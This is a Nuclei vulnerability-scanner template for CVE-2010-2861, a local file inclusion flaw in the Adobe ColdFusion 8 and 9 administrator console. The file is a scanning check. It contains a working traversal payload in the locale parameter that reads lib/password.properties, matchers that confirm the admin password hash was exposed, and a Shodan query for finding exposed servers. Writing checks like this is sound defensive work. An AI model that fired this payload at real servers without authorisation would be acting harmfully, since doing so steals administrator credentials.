nuclei-templates/cves/2010/CVE-2010-2861.yaml

id: CVE-2010-2861

info:
  name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
  author: pikpikcu
  severity: high
  description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
    - http://www.adobe.com/support/security/bulletins/apsb10-18.html
    - http://securityreason.com/securityalert/8148
  remediation: Upgrade to a supported version.
  classification:
    cve-id: CVE-2010-2861
  metadata:
    shodan-query: http.component:"Adobe ColdFusion"
  tags: cve,cve2010,coldfusion,lfi,adobe,cisa

requests:
  - method: GET
    path:
      - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "rdspassword="
          - "encrypted="
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/17